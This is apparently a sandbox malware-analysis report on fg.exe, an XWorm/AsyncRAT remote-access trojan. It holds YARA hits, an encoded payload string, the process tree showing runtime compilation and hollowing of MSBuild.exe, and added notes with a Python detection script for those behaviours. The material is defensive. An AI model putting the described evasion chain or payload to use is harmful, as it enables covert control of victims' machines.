            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2c98a14.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2ca3b5c.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.5150600.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2c98a14.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2c99014.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.5150000.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPE | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000008.00000003.1392608875.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000008.00000003.1390048406.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000008.00000003.1392073951.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000008.00000003.1390119908.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPED | Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
            Source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPED | Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.5150600.3.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.5150600.3.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.5150600.3.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, AlgorithmAES.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, Helper.cs | Cryptographic APIs: 'TransformFinalBlock'
            Source: fg.exe, GetPool.csBase64 encoded string: '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
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 8.3.csc.exe.9dbdf0.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 8.3.csc.exe.9dbdf0.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.2.fg.exe.2ca3b5c.0.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 8.3.csc.exe.9dbdf0.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.2.fg.exe.2c99014.1.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 4.2.fg.exe.5150600.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 4.2.fg.exe.5150600.3.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e.csproj_161H6
            Source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
            Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@12/13@1/1
            Source: C:\Users\user\Desktop\fg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fg.exe.logJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6344:120:WilError_03
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\QsOwMXrJgXTZTM1E
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3708:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess516
            Source: C:\Users\user\Desktop\fg.exeFile created: C:\Users\user\AppData\Local\Temp\cy31atwyJump to behavior
            Source: fg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: fg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\fg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: fg.exeVirustotal: Detection: 66%
            Source: fg.exeReversingLabs: Detection: 63%
            Source: unknown | Process created: C:\Users\user\Desktop\fg.exe "C:\Users\user\Desktop\fg.exe"
            Source: C:\Users\user\Desktop\fg.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline"
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9651.tmp" "c:\Users\user\AppData\Local\Temp\cy31atwy\CSC8910777A3B084AE58CA4772E6114D41.TMP"
            Source: C:\Users\user\Desktop\fg.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Users\user\Desktop\fg.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            Source: C:\Users\user\Desktop\fg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1668
            Note: read this as one chain. fg.exe compiles a helper assembly at run time through csc.exe, feeding it a response file under %TEMP%\cy31atwy (cvtres.exe is csc's normal resource-compiler child, not a separate stage). It then launches MSBuild.exe twice with no project file, which a build tool never does on its own: an argument-less Microsoft-signed host is the classic target for hollowing. One MSBuild.exe instance (PID 516) crashes and spawns WerFault.exe, which is why a WER crash dump appears among the dropped files below and carries the payload's strings.
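            The two behaviours in that chain (a compiler fed input from a user-writable directory, and MSBuild.exe started with nothing to build) are what an endpoint rule should key on. The following is an added example in Python, not code from the Joe Sandbox report: it parses a constructed "parent => child command line" log whose entries mirror the process tree above, plus two benign controls (PowerShell's Add-Type compiles through csc.exe in exactly the same way, and a real build passes a project file). The rule names, the allow-list of build-tool parents and the log format are assumptions made for the example.

```python
"""Flag run-time compilation from user-writable paths and argument-less MSBuild.exe.
Added example, not from the Joe Sandbox report; the log format
"<parent image> => <child command line>" and the sample lines are constructed."""
import re
from pathlib import PureWindowsPath

# Directories an unprivileged user can write to; compiler input from here is suspect.
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\users\\public\\", "\\programdata\\", "\\downloads\\")
COMPILERS = {"csc.exe", "vbc.exe"}
# Parents for which an argument-less MSBuild.exe is unremarkable (assumed allow-list).
BUILD_TOOL_PARENTS = {"devenv.exe", "dotnet.exe", "msbuild.exe", "vbcscompiler.exe"}

# First command-line token, quoted or bare.
_IMAGE_RE = re.compile(r'^\s*(?:"([^"]+)"|(\S+))')

SAMPLE_LOG = [  # constructed sample mirroring the report's process tree
    r'C:\Users\user\Desktop\fg.exe => "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline"',
    r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe => C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9651.tmp"',
    r'C:\Users\user\Desktop\fg.exe => "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"',
    r'C:\Users\user\Desktop\fg.exe => "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"',
    # Benign controls: PowerShell Add-Type compiles the same way; a real build passes a project.
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe => "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ab12cd\ab12cd.cmdline"',
    r'C:\Program Files\dotnet\dotnet.exe => "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" app.csproj /t:Rebuild',
]


def parse_line(line):
    """Split a log line into (parent image, child image, child arguments)."""
    parent, _, cmdline = line.partition(" => ")
    m = _IMAGE_RE.match(cmdline)
    image = m.group(1) or m.group(2)
    return parent.strip(), image, cmdline[m.end():].strip()


def _base(path):
    return PureWindowsPath(path).name.lower()


def _user_writable(path):
    p = path.lower()
    return p.startswith("c:\\users\\") or any(marker in p for marker in USER_WRITABLE)


def classify(line):
    """Return the rule names a single process-creation event trips."""
    parent, image, args = parse_line(line)
    hits = []
    if _base(image) in COMPILERS and any(mk in args.lower() for mk in USER_WRITABLE):
        hits.append("compiler_input_in_user_writable_dir")        # the Sigma-style condition
        if _user_writable(parent):
            hits.append("compiler_parent_in_user_writable_dir")   # separates fg.exe from Add-Type
    if _base(image) == "msbuild.exe" and not args and _base(parent) not in BUILD_TOOL_PARENTS:
        hits.append("msbuild_without_project")  # a build tool with nothing to build: injection host
    return hits


def scan(lines):
    """Map line index -> rule hits, for every line that tripped at least one rule."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify(line))}


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_LOG).items():
        print(i, hits)
```

            The parent check is what keeps the compiler rule usable: csc.exe reading a .cmdline file under %TEMP% fires constantly on machines that run PowerShell scripts with Add-Type, so the example records that as a weaker hit and reserves the stronger name for a parent that itself lives under a user profile, as fg.exe does here.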
            Source: C:\Users\user\Desktop\fg.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, wldp.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, ntmarta.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Sections loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll (loaded twice), version.dll, kernel.appcore.dll, mscoree.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Sections loaded: vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, kernel.appcore.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Sections loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, mswsock.dll, wbemcomn.dll, amsi.dll, userenv.dll, avicap32.dll, msvfw32.dll, winmm.dll (loaded twice)
            Note: the fg.exe, csc.exe and cvtres.exe lists are a plain CLR start-up footprint (mscoree, the CLR's private CRT, CryptoAPI providers, AMSI). The MSBuild.exe list is not: avicap32.dll and msvfw32.dll are the Video for Windows capture libraries (webcam access), wbemcomn.dll is the WMI client support library, and mswsock.dll is the Winsock provider. A build tool has no reason to load any of them; they are what the injected RAT's webcam, WMI-enumeration and C2 code pull in.
            Source: C:\Users\user\Desktop\fg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: fg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: fg.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: fg.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Note: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR is the CLR header, which confirms the TrID result that fg.exe is a managed (.NET) executable; IMAGE_DIRECTORY_ENTRY_DEBUG means a CodeView record with a PDB path is present. mscorrc.dll is the CLR's resource library, opened when the runtime formats an exception message, which fits the MSBuild.exe crash recorded above.
            Binary strings (PDB paths), grouped by the memory region or dropped file they were read from:
            Source: WERB78B.tmp.dmp.19.dr (WER crash dump of the faulting MSBuild.exe)
                System.Configuration.pdbL0uw#
                System.Xml.ni.pdbRSDS#
                System.Core.ni.pdb
                Microsoft.VisualBasic.pdb
                System.Management.ni.pdbRSDSJ<
                mscorlib.ni.pdb
                System.Configuration.ni.pdbRSDScUN
                System.Core.pdbP
                System.Xml.ni.pdb
                System.ni.pdbRSDS
                System.Configuration.ni.pdb
                mscorlib.ni.pdbRSDS
                System.Configuration.pdb
                System.Xml.pdb
                System.pdb
                System.Windows.Forms.pdb
                mscorlib.pdb
                System.Drawing.pdb|
                System.Drawing.pdb
                System.Management.pdb
                System.Management.ni.pdb
                System.Core.pdb
                System.ni.pdb
                System.Core.ni.pdbRSDS
            Source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
                \??\C:\Windows\dll\mscorlib.pdb
                \??\C:\Windows\symbols\dll\mscorlib.pdbngVideMRw
                C:\Windows\mscorlib.pdbpdblib.pdbs>x
                C:\Windows\MSBuild.pdbpdbild.pdbK>
                \??\C:\Windows\symbols\exe\MSBuild.pdb
                \??\C:\Windows\mscorlib.pdb
                mscorlib.pdbr2
                \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB
                \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbI
                \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb
                \??\C:\Windows\dll\mscorlib.pdb~
